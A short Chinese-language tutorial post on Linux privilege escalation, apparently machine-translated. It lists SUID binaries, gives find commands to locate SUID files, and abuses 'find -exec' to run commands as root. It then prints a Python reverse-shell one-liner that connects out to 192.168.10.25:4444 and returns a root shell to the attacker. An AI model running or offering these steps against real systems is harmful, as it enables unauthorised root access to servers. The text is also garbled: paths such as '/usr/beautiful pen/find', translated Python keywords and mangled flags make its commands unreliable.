Linux提权,linux提权命令

  Linux提权,linux提权命令

  SUID允许调用者以文件所有者的身份运行文件,所以使用SUID提升权限的思路是运行root用户拥有的SUID的文件,所以我们在运行文件的时候要得到root用户的身份。

  可用于声明权力的已知linux可行性文件列表如下:

  nmap vim find bash more less nano CP

  以下命令可以发现系统上运行的所有SUID可执行文件。

  1.#以下命令将尝试以root权限查找SUID的文件。不同的系统适合不同的命令。试试2。find/-perm-u=s-type F2/dev/null 3 . find/-user root-perm-4000-print 2/dev/null 4 . find/-user root-perm。

  使用查找文件提升权限

  如果我们现在得到了一个网站服务器的外壳,但是权限是ubuntu,我们需要马上提升到root用户的权限。

  我们以超级用户权限查看SUID文件。

  find/-perm -u=s -type f 2/dev/null

  我们随便找一个命令利用一下,我们就找find,先查一下它的信息,发现确实是root用户权限的SUID的文件。

  首先,让我们看看是否可以使用find命令以root身份运行,并且发现我们确实可以以root身份运行。

  /usr/beautiful pen/find examples . desktop-exec whoami/;

  至于这里为什么可以用find -exec,你可以查一下find帮助或者man手册。

  然后我们检查目标网站上是否有python环境,可以看到有python2.7.6环境。

  所以我们使用python作为root用户来反弹shell。

  python -c 导入套接字、子进程、OS;s=socket.socket(socket。AF_INET,socket。SOCK _ STREAM);s.connect((192.168.10.25 ,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess . call([/beautiful pen/sh ,-I ]);#弹起一枚sh型炮弹

  大家可以看到,反弹回来的壳是攻击端收到的,是root。

Linux提权,linux提权命令